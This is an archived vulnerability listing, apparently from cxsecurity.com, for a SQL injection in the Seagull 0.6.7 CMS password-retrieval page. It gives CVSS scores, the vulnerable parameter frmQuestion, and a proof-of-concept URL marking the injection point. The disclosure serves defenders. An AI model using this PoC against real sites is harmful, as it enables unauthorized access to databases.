Seagull 0.6.7 remote SQL injection vulnerability.

2010.08.31
Credit: Sweet
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

1 ###################################### 1 0 Sweet the Algerian Haxxor 0 1 ###################################### 0 0 1 1 [+]Exploit Title: seagull-0.6.7 SQLinjection Vulnerabilitie 0 0 [+]Date: 29/08/2010 1 1 [+]Author: Sweet 0 0 [+]Contact : charif38@hotmail.fr 0 1 [+]Software Link: http://seagullproject.org/ 0 0 [+]Download: 1 1 [+]Version: 0.6.7 and lesser 0 0 [+]Tested on: WinXp sp3 1 1 [+]Risk : Hight 0 0 [+]Description : just another CMS 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 SQL injection : in /seagnulPath/www/index.php/user/password with http request editor The POST variable frmQuestion has been set to 1' POC: http://server/index.php/user/password/?action=retrieve&frmEmail=111-222-1933email@address.tst&frmQuestion=1'[SQLI]&frmAnswer=111-222-1933email@address.tst&submitted=retrieve screen shot:http://img163.imageshack.us/img163/3028/imagexp.jpg thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com Saha Ftourkoum et 1,2,3 viva L'Algerie :))

References:

http://xforce.iss.net/xforce/xfdb/61469
http://www.exploit-db.com/exploits/14838
http://secunia.com/advisories/41169
http://packetstormsecurity.org/1008-exploits/seagull-sql.txt
http://osvdb.org/67689


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top